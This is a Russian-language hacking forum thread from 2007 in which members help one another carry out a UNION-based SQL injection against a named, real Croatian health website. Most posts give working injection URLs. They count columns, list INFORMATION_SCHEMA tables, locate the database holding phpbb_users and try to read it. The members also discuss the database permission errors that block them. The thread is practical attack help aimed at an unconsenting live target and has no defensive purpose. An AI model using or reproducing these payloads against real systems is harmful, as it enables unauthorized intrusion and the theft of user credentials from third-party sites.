sql выдает ошибку

Discussion in 'Уязвимости' started by m0use, 29 Aug 2007.

  1. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    _http://www.zdravlje.hr/clanak.php?id=m-72+union+select+1,table_name,3+from+INFORMATION_SCHEMA.TABLES/*

    есть такой скуль. там выводит таблицу phpbb, и так я знаю впринципе что он там есть, но приобращении.
    http://www.zdravlje.hr/clanak.php?id=m-72+union+select+1,2,3+from+phpbb/*
    или же
    _http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+from+phpbb/*
    выдает ошибку
     
  2. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    13 столбцов.
     
  3. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    Где именно что то я не очень понял
     
  4. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    Code:
    http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.TABLES+limit+7,1/*
    гугл, антибоян
     
  5. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    Это я и так знал... я не про это спрашивал... при обращении phpbb_users ошибку выдает
     
  6. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Ищи, в какой БД таблица лежит
     
  7. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Code:
    http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
    ТС, вообщето:
    Code:
    http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,имя_столбца,5,6,7,8,9,10,11+from+имя_таблицы/*
    А не просто имя_таблицы
     
    #7 NOmeR1, 29 Aug 2007
    Last edited: 29 Aug 2007
  8. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Code:
    http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+information_schema.tables+where+table_name=char(0x50,0x48,0x50,0x42,0x42,0x5f,0x55,0x53,0x45,0x52,0x53)/*
    --> phpbb_users

    Code:
    http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_schema,12,13+from+information_schema.tables+where+table_name=char(0x50,0x48,0x50,0x42,0x42,0x5f,0x55,0x53,0x45,0x52,0x53)/*
    --> beracivi

    Однако,

    Code:
    http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+beracivi.phpbb_users/*
    Не катит... :(
     
  9. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Видимо текущему MySQL юзеру запрещен доступ к БД beracivi
     
    1 person likes this.
  10. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.zdravlje.hr/clanak.php?id=-12909+union+select+concat(table_schema,char(46),table_name),2,3,4,5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES+where+table_name=0x70687062625f7573657273+limit+22,1/*
    Там 22 Базы Данных содержат таблицу phpbb_users и далеко не факт что БД, используемая этим сайтом содержит эту таблицу. На просмотр БД других сайтов у этого пользователя прав не хватает.